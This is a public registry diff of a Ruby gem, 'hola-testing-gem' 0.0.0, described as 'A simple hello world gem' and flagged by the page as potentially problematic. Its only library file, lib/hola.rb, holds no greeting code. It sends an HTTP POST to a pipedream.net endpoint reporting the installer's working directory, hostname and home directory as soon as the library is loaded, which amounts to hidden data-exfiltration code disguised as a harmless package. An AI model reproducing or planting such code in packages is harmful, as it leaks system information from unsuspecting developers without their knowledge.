hola-testing-gem 0.0.0-universal-darwin-19

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of hola-testing-gem might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/hola.rb +6 -0
  3. metadata +43 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 0445cb6bc45526caea6b38a1d77cf2fc878f407f7fb8424b1aa14c18894df46d
4
+ data.tar.gz: a6a70bcf2bbf8b7221ee3d97b746f037646e59e4a23fd37e3582984331753306
5
+ SHA512:
6
+ metadata.gz: 863e6ba5d08c6221999e29d1aa8c19ab2055156dcc6ea9d1f3a3bf46864d71a3630c6250118b6d49690c5a650324abc83e005b024d56ccb48bc33b0588d44972
7
+ data.tar.gz: b7adec5ab1b235e110cfd87330aacdd972cd05ab5c1e03500fa671cea24afb7e2e9886bad3fb6f5b228c0e72f1ce5a182fe497f3208d25ad5053d6c20fba2a12
data/lib/hola.rb ADDED
@@ -0,0 +1,6 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+ require 'socket'
4
+ url = "https://enhwr81xye7ad.x.pipedream.net"
5
+ Net::HTTP.post(URI(url), "cwd:#{Dir.pwd};hostname:#{Socket.gethostname};home:#{Dir.home};gem:GEM_NAME")
6
+
metadata ADDED
@@ -0,0 +1,43 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: hola-testing-gem
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.0
5
+ platform: universal-darwin-19
6
+ authors:
7
+ - Nick Quaranto
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2022-05-09 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: A simple hello world gem
14
+ email: nick@quaran.to
15
+ executables: []
16
+ extensions: []
17
+ extra_rdoc_files: []
18
+ files:
19
+ - lib/hola.rb
20
+ homepage: https://rubygems.org/gems/hola-testing-gem
21
+ licenses:
22
+ - MIT
23
+ metadata: {}
24
+ post_install_message:
25
+ rdoc_options: []
26
+ require_paths:
27
+ - lib
28
+ required_ruby_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: '0'
33
+ required_rubygems_version: !ruby/object:Gem::Requirement
34
+ requirements:
35
+ - - ">="
36
+ - !ruby/object:Gem::Version
37
+ version: '0'
38
+ requirements: []
39
+ rubygems_version: 3.0.3.1
40
+ signing_key:
41
+ specification_version: 4
42
+ summary: Hola!
43
+ test_files: []